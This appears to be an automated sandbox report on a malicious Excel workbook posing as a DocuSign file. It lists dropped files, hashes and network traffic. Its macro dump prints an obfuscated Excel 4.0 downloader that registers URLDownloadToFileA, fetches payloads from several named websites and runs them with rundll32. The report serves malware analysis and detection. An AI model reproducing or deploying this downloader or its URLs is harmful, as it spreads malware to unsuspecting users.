                          Preview: p...... ....h...x.......(....................................................... .........(.f...@8..................h.t.t.p.:././.c.r.t...u.s.e.r.t.r.u.s.t...c.o.m./.U.S.E.R.T.r.u.s.t.R.S.A.A.d.d.T.r.u.s.t.C.A...c.r.t...".5.c.8.6.f.6.8.0.-.5.8.5."...
                          C:\Users\user\AppData\Local\Temp\9ACE0000
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):31753
                          Entropy (8bit):7.647975541014588
                          Encrypted:false
                          SSDEEP:768:TkBP+MDFc5uhNUuOW+u7qS7oauYEmUI/V7nz:TQWMHNffMaFTBz
                          MD5:C450D67B76EB836299B13DE6DA5E1F16
                          SHA1:5617B9FC421C180FD7FCEC8054738DB0811B7FF2
                          SHA-256:0498E5ED54BDC48996FB1D86DF4B1A605D2AFF9DE3C280C652E00149F278B041
                          SHA-512:82550411A326F52E5184BA66AA4EB46FE18AE0259D7BCA02A106F0A3162F76AD901326AF8C1A49ED3756C9CC34AB811653F33BCFEDD97F3E6ABB8BCA76078570
                          Malicious:false
                          Preview: .U.n.0....?......(..r.Mrl.$...\K....I..v..pl).E.R.3;+.N.V.TO.Q{..f.*p.+..y......pJ..ek@v5..i.........O)...e.V`..8.Y.hE.... .Rt./'.o\z...:..l6...x4..Y..FIp..~n..T-.6..:?..k...!.-E....S{.j.Xh...GKb...... Y..Ic.....|.3..q.[..B.a.._.w...[.^g.....F....1.....+.}\._6.dk,..`...c.........(<.T....b....x5r&%...E.X!......\..w<M....\.7..9.........m..b.E.u...u.]...'t.(....}8..m...C~..E.....?..Z.]..i.D.O..B3....b.k..Z....x.A.yJ)P..y...........PK..........!........V.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\CabE18A.tmp
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                          Category:dropped
                          Size (bytes):59134
                          Entropy (8bit):7.995450161616763
                          Encrypted:true
                          SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                          MD5:E92176B0889CC1BB97114BEB2F3C1728
                          SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                          SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                          SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                          Malicious:false
                          Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                          C:\Users\user\AppData\Local\Temp\TarE18B.tmp
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):152788
                          Entropy (8bit):6.316654432555028
                          Encrypted:false
                          SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                          MD5:64FEDADE4387A8B92C120B21EC61E394
                          SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                          SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                          SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                          Malicious:false
                          Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Feb 24 18:53:37 2021, atime=Wed Feb 24 18:53:37 2021, length=16384, window=hide
                          Category:dropped
                          Size (bytes):867
                          Entropy (8bit):4.484286352929908
                          Encrypted:false
                          SSDEEP:12:85QPYJKLgXg/XAlCPCHaXtB8XzB/q0V8vX+WnicvbASbDtZ3YilMMEpxRljKQgTg:850l/XTd6jI0KvYeM+Dv3qRMrNru/
                          MD5:C3DF441E3A0FAA3865D6CBE65AE80420
                          SHA1:C8ADC68C8F216B0CE53988B7C776BF74D910C2AB
                          SHA-256:F46B8231349682FC73826208C6B3E319F1CEB297B587D44DE25EB674D6B146F6
                          SHA-512:AFE05879C5100952D22CB77BD51354AB1F695481A0AB6E892953410D6ABB183AA1AB0AEE594A0E897845753620E4FA295AE8C9F4B04DDEA3F259D345C033599B
                          Malicious:false
                          Preview: L..................F...........7G...............@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....XR....Desktop.d......QK.XXR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......494126..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.XF.AShadow.4960.21593.LNK
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Feb 24 18:53:26 2021, mtime=Wed Feb 24 18:53:37 2021, atime=Wed Feb 24 18:53:37 2021, length=57856, window=hide
                          Category:dropped
                          Size (bytes):2308
                          Entropy (8bit):4.583571527650622
                          Encrypted:false
                          SSDEEP:48:8Z//XT0jCH57SrHlRMQh2Z//XT0jCH57SrHlRMQ/:8Z//XojCkxRMQh2Z//XojCkxRMQ/
                          MD5:D3B67CEA335F33DF91E53F7DCA864414
                          SHA1:54978D6415E1E62EAEA254652D2494C424AB37C5
                          SHA-256:3004BAFFD2BB3F98B8B1D4AD377C26211E10C5B00DC2A935E1149412218B71C0
                          SHA-512:64D929D5E5BDF9263E5798445D367C5F69833AADF7F2C3EF9E293BA5802E51D31E151D30ACDFD9D5E0DCD3CBFA1710F8D0E3BE00B2C92F77BC47EB2A0DFC701D
                          Malicious:false
                          Preview: L..................F.... .....D...........^...................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....XR....Desktop.d......QK.XXR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..:..XR.. .SECURI~1.XLS.........XR..XR..*...H.....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...X.F...A.S.h.a.d.o.w...4.9.6.0...2.1.5.9.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop\SecuriteInfo.com.XF.AShadow.4960.21593.xls.A.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...X.F...A.S.h.a.d.o.w...4.9.6.0...2.1.5.9.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.
                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):167
                          Entropy (8bit):5.11643252492809
                          Encrypted:false
                          SSDEEP:3:oyBVomM0biqoJL6ThEYYuscbiqoJL6ThEYYmM0biqoJL6ThEYYv:dj60TImVFTImVK0TImVC
                          MD5:ABDABA003B0855E784BF8E5C8143E3C2
                          SHA1:CE8D3FD2812648611BE370DE329A28DE3C384FAC
                          SHA-256:58685D6ED989BA45D0EC74987746F18F04469041C6CEE708A13AE3C1DBB979B8
                          SHA-512:AF8325DFE0E0E79F01441B741AAD0BF3853DEB6CD64877B1965D6EEE3670E5DAFC1049ED356EE2921E2374AB0F07998CC017032C1D9BA5C0F7B7EA2DB743AB09
                          Malicious:false
                          Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.XF.AShadow.4960.21593.LNK=0..SecuriteInfo.com.XF.AShadow.4960.21593.LNK=0..[xls]..SecuriteInfo.com.XF.AShadow.4960.21593.LNK=0..
                          C:\Users\user\Desktop\5BCE0000
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Applesoft BASIC program data, first line number 16
                          Category:dropped
                          Size (bytes):88220
                          Entropy (8bit):6.54997160698009
                          Encrypted:false
                          SSDEEP:1536:rP8rmjAItyzElBIL6lECbgBGGP5xLmQWVxd7f85oaGzeNlz5QaGzeNlfFYVcDZKI:rP8rmjAItyzElBIL6lECbgBGGP5xLm7M
                          MD5:449C40C978932029A37F12CC14C9D86D
                          SHA1:1DD9186CCEC79A0B8438753630EF43838A771E7A
                          SHA-256:76630998E370E064979B7DC9B33DB6CA7E8C0A211B4A4DEE89F197D96C977B57
                          SHA-512:2059D9A2CCE52E90DE440C5874315A7A0C4FF55C4EB58588D043E738224A99C4B5FF974C8C08484BA62069FF173FDDA81104BD1537443AED1BDBC5A0A42A25A8
                          Malicious:false
                          Preview: ........g2..........................\.p....user B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                          Static File Info

                          General

                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 13:42:21 2021, Security: 0
                          Entropy (8bit):3.697666945848156
                          TrID:
                          • Microsoft Excel sheet (30009/1) 78.94%
                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                          File name:SecuriteInfo.com.XF.AShadow.4960.21593.xls
                          File size:145920
                          MD5:b00ae2a23ee80960d42e155f9814b490
                          SHA1:7673823a676d34a46128f8f6d7f09e8b2f3d8db4
                          SHA256:80d0f40411596b3f2350399c4d76f19d892771f835c1b2f6e3c77955e72e784f
                          SHA512:dca45ca42b21b954196f501d1d4396fb221d3e92c50cea599f8bb096e0acfe48428370a040d35a0da2ec268e32c26ff7d1adab862aecca9ae92838028646391a
                          SSDEEP:3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/1:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOMU
                          File Content Preview:........................>......................................................................................................................................................................................................................................

                          File Icon

                          Icon Hash:e4eea286a4b4bcb4

                          General

                          Document Type:OLE
                          Number of OLE Files:1

                          Indicators

                          Has Summary Info:True
                          Application Name:Microsoft Excel
                          Encrypted Document:False
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:
                          Flash Objects Count:
                          Contains VBA Macros:True

                          Summary

                          Code Page:1251
                          Author:
                          Last Saved By:Friner
                          Create Time:2006-09-16 00:00:00
                          Last Saved Time:2021-02-18 13:42:21
                          Creating Application:Microsoft Excel
                          Security:0

                          Document Summary

                          Document Code Page:1251
                          Thumbnail Scaling Desired:False
                          Contains Dirty Links:False
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          File Type:data
                          Stream Size:4096
                          Entropy:0.321292606979
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                          General
                          Stream Path:\x5SummaryInformation
                          File Type:data
                          Stream Size:4096
                          Entropy:0.2746714277
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                          General
                          Stream Path:Book
                          File Type:Applesoft BASIC program data, first line number 8
                          Stream Size:135085
                          Entropy:3.69042254796
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . .
                          Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          ,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,
                          ,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,

                          Network Behavior

                          Network Port Distribution

                          • Total Packets: 59
                          • 443 (HTTPS)
                          • 80 (HTTP)
                          • 53 (DNS)
                          TimestampSource PortDest PortSource IPDest IP
                          Feb 24, 2021 11:54:13.697228909 CET4916780192.168.2.2272.52.227.180
                          Feb 24, 2021 11:54:13.847944021 CET804916772.52.227.180192.168.2.22
                          Feb 24, 2021 11:54:13.848059893 CET4916780192.168.2.2272.52.227.180
                          Feb 24, 2021 11:54:13.848664999 CET4916780192.168.2.2272.52.227.180
                          Feb 24, 2021 11:54:13.999258041 CET804916772.52.227.180192.168.2.22
                          Feb 24, 2021 11:54:14.320781946 CET804916772.52.227.180192.168.2.22
                          Feb 24, 2021 11:54:14.320823908 CET804916772.52.227.180192.168.2.22
                          Feb 24, 2021 11:54:14.321048975 CET4916780192.168.2.2272.52.227.180
                          Feb 24, 2021 11:54:14.321799994 CET4916780192.168.2.2272.52.227.180
                          Feb 24, 2021 11:54:14.472290993 CET804916772.52.227.180192.168.2.22
                          Feb 24, 2021 11:54:14.500850916 CET4916880192.168.2.22162.241.80.6
                          Feb 24, 2021 11:54:14.659456015 CET8049168162.241.80.6192.168.2.22
                          Feb 24, 2021 11:54:14.659682035 CET4916880192.168.2.22162.241.80.6
                          Feb 24, 2021 11:54:14.660200119 CET4916880192.168.2.22162.241.80.6
                          Feb 24, 2021 11:54:14.826414108 CET8049168162.241.80.6192.168.2.22
                          Feb 24, 2021 11:54:15.358295918 CET8049168162.241.80.6192.168.2.22
                          Feb 24, 2021 11:54:15.358560085 CET4916880192.168.2.22162.241.80.6
                          Feb 24, 2021 11:54:15.753170967 CET4916980192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:16.041574955 CET8049169138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:16.041765928 CET4916980192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:16.042413950 CET4916980192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:16.330919981 CET8049169138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:16.467619896 CET8049169138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:16.467663050 CET8049169138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:16.467823029 CET4916980192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:16.479756117 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:16.777595043 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:16.777699947 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:16.788238049 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:17.085958004 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:17.087625027 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:17.087649107 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:17.087672949 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:17.087884903 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:17.102488041 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:17.400794983 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:17.401002884 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:19.178481102 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:19.516464949 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:20.358824968 CET8049168162.241.80.6192.168.2.22
                          Feb 24, 2021 11:54:20.359031916 CET4916880192.168.2.22162.241.80.6
                          Feb 24, 2021 11:54:21.342526913 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.342566013 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.342581987 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.342607021 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.342655897 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.342690945 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.342792988 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.342833996 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.342837095 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.342890978 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.342922926 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.342922926 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.342982054 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.343056917 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.343153000 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.344804049 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.344891071 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.350811958 CET4917480192.168.2.2272.52.227.180
                          Feb 24, 2021 11:54:21.374596119 CET8049169138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.374665976 CET4916980192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.506086111 CET804917472.52.227.180192.168.2.22
                          Feb 24, 2021 11:54:21.506186008 CET4917480192.168.2.2272.52.227.180
                          Feb 24, 2021 11:54:21.507049084 CET4917480192.168.2.2272.52.227.180
                          Feb 24, 2021 11:54:21.640588999 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.640621901 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.640722990 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.640769005 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.640809059 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.640829086 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.640887022 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.640904903 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.640928984 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.640930891 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.640933037 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.640942097 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.640968084 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.640970945 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.640974045 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641050100 CET49170443192.168.2.22138.36.237.100
